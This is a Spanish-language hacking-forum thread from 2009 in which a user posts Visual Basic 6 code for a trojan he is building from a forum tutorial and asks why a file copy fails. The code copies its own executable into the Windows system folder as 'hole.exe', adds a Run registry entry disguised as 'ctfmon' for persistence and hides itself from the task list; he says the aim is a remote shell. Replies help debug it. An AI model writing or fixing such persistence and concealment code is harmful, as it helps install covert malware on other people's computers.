elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Error al copiar archivo (file not found)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Error al copiar archivo (file not found)  (Leído 3,936 veces)
50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Error al copiar archivo (file not found)
« en: 15 Mayo 2009, 15:26 pm »

veran, estoy siguiendo un tutorial que anda por aqui sobre como crear un troyano, pero le estoy haciendo a m manera tomando alguna idea del manual

El error se me genera al copiar un archivo que se aloja en una variable, aqui esta el code:

Código:
Private Sub Form_Load()
Dim ip As String, port As Integer
Dim dioxis As String
Dim win, sys, residencia

ip = "192.168.6.100"
port = 666
dioxis = App.Path

ip = wsk.RemoteHost
port = wsk.RemotePort

If Right(dioxis, 1) <> "\" Then dioxis = dioxis & "\"
dioxis = dioxis & App.EXEName & ".exe"

Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)

win = LCase(win)
sys = LCase(sys)

FileCopy dioxis, sys & "\hole"
Name sys & "\hole" As sys & "\hole.exe"

Set residencia = CreateObject("WScript.Shell")

residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "ctfmon", sys & "\hole.exe"



App.TaskVisible = False
End Sub

he revisado y rerevisado el codigo pero no encuentro el error


En línea

ranslsad


Desconectado Desconectado

Mensajes: 492


Dim Ranslsad as String * :P - Que Vicio!


Ver Perfil WWW
Re: Error al copiar archivo (file not found)
« Respuesta #1 en: 15 Mayo 2009, 16:43 pm »

Nose hehe
pero para comprobar si el app esta bien hace esto:

Debajo de este codigo:
Código
  1. If Right(dioxis, 1) <> "\" Then dioxis = dioxis & "\"
  2. dioxis = dioxis & App.EXEName & ".exe"

Pone:
Código
  1. Msgbox dioxis

Y ya ves si esta bien la dir o mal.

Salu2

Ranslsad


En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: Error al copiar archivo (file not found)
« Respuesta #2 en: 15 Mayo 2009, 21:23 pm »


PAra verificar si existe un Directorio, Archivo o no se yo lo que desees usa:
Código
  1. if dir(RutaEXE/Directorio,tipo) then
  2.     'Si Existe
  3. else
  4.     'No Existe
  5. end if
  6.  

Este solo corrige el directorio residente del archivo para posteriormente concatenar solamente el nombre/extensión
Código
  1. If Right(dioxis, 1) <> "\" Then dioxis = dioxis & "\"
  2. dioxis = dioxis & App.EXEName & ".exe"
  3.  

Saludos, Dulces Lunas
En línea

The Dark Shadow is my passion.
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: Error al copiar archivo (file not found)
« Respuesta #3 en: 15 Mayo 2009, 21:33 pm »

a si si quieres alojar una rchivo en una variable usa

Código
  1. Open Ruta for binary as 1
  2.     get 1,,Variable
  3. close 1
  4. 'Procesos deseados
  5.  

Lo que tu haces es solo almacenar la ruta del archivo.

Saludos, Dulces Lunas
En línea

The Dark Shadow is my passion.
XcryptOR

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Re: Error al copiar archivo (file not found)
« Respuesta #4 en: 16 Mayo 2009, 06:26 am »

usa Apis y problema arreglado
En línea



YST


Desconectado Desconectado

Mensajes: 965


I'm you


Ver Perfil WWW
Re: Error al copiar archivo (file not found)
« Respuesta #5 en: 16 Mayo 2009, 09:01 am »

Esos es un copy paste de el manual de Xenon :silbar:

Prueba con la api CopyFile

http://allapi.mentalis.org/apilist/CopyFile.shtml
En línea



Yo le enseñe a Kayser a usar objetos en ASM
50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: Error al copiar archivo (file not found)
« Respuesta #6 en: 16 Mayo 2009, 11:15 am »

esa pàrte es la que he tenido que copiar ya que me daba muchos errores

estoy haciendo una obtencion de una shell remota, ya que me dio la idea al ver en el manual que poniendo tu paint, le ejecutabas el paint jeje, y se me ocurrio asi hacer una shell remota, lo unico copiado es este trozo, el que tengo que copiar y poner en el registro...etc

como seria con una api

sorry por mi escasa habilidad con vb, he empezado hace pocos dias

-------------------------------

edito, antes del filecopy he puesto un msbox y este es su resultado



y justo despues, aqui el error



----------------------

reedito de nuevo, al compilar ahora me deja, antes nose porque no, pero ahora si
« Última modificación: 16 Mayo 2009, 11:26 am por 50l3r » En línea

Dessa


Desconectado Desconectado

Mensajes: 624



Ver Perfil
Re: Error al copiar archivo (file not found)
« Respuesta #7 en: 16 Mayo 2009, 11:56 am »

No te digo que este sea el caso, pero algunos errores (aleatorios) similares a el tuyo los solucione haciendo una pausa de un par de segundos antes del Filecopy

Código:

Dim x As Long: x = Round(Timer): While Round(Timer) < x + 2: DoEvents: Wend


Saludos

PD: si usas API mejor







« Última modificación: 16 Mayo 2009, 12:17 pm por Dessa » En línea

Adrian Desanti
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Imposible copiar. Path not found D:
Programación Visual Basic
CAR3S? 5 4,550 Último mensaje 24 Diciembre 2010, 12:34 pm
por CAR3S?
error 7 hasp hl key no found
Seguridad
josepiños 1 4,700 Último mensaje 18 Marzo 2014, 16:40 pm
por cincillate
Hydra [ERROR] File for passwords not found: a.txt
Hacking
namedir 6 7,297 Último mensaje 12 Septiembre 2015, 12:56 pm
por namedir
error bash: python: command not found.
GNU/Linux
behindfa21 3 3,424 Último mensaje 17 Marzo 2022, 06:16 am
por .xAk.
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines